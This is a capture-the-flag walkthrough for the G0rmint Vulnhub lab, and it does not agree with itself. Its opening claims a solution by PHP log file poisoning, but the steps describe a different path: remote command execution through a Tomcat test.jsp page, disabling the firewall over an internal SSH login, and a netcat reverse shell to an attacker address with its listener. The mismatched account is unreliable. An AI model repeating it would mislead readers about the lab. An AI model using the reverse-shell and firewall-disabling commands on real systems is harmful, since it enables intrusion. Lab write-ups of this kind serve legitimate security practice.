We covered the solution of G0rmint Vulnhub lab by applying log file poisoning in a website based on PHP to execute system command.
Description
It is based on a real world scenario I faced while testing for a client’s site. Dedicated to Aunty g0rmint who is fed up of this government (g0rmint). Does anyone need to know about that Aunty to root the CTF? No The CTF is tested on Vmware and working well as expected. Difficulty level to get limited shell: Intermediate or advanced Difficulty level for privilege escalation: No idea.
1. Initial Scan & Discovery
I started by performing an nmap
scan of the vulnerable machine. Initially, only the HTTP server (port 80) appeared open; the SSH server (port 22) was closed due to a firewall. Conceptual nmap
command: nmap -sV <target_IP>
Navigating to the web server revealed an Apache Tomcat page. Using a scanner like Nikto, I discovered a crucial file named test.jsp
. Conceptual nikto
command: nikto -h http://<target_IP>
2. Exploiting the JSP Vulnerability
The test.jsp
page had an input box that allowed users to enter commands to get directory listings. This immediately indicated a Remote Command Execution (RCE) vulnerability.
- I could list contents of directories like
/temp
or/etc
. - By listing the
/home
directory, I found a user directory named “bill”. - Listing the contents of
/home/bill
revealed an.ssh
directory, which was a key discovery as it indicated an SSH server was running internally on the machine, even though the external port was blocked by a firewall. Conceptual command injected intotest.jsp
input box:ls -la /home
andls -la /home/bill
3. Disabling the Firewall
The next critical step was to use the internal SSH client to disable the firewall and open the external SSH port. The video mentioned the command to disable the firewall using sudo ufw disable
via the internal SSH client, although I had already performed this action prior to the recording.
Conceptual command (executed via test.jsp
‘s RCE, targeting the internal SSH client): ssh bill@127.0.0.1 'sudo ufw disable'
(This would involve SSHing to localhost as the “bill” user, then executing the sudo ufw disable
command to open the firewall. The video implies that “bill” has sudo privileges for this specific command.)
After running this command, a rescan of the machine would show the SSH port (22) as open externally.
4. Gaining Root Access
With the SSH port now open, the next step was to establish a reverse shell. I used a pre-copied command to initiate a netcat session back to my attacking machine. After a slight correction in the command (removing an accidental space), I successfully gained root access on the vulnerable machine.
Conceptual command (executed via test.jsp
‘s RCE once SSH is open): nc -e /bin/bash <attacker_IP> <listening_port>
(This is a common netcat reverse shell, assuming netcat is present on the target with the -e
option)
On attacker machine, before executing the above on target: nc -lvnp <listening_port>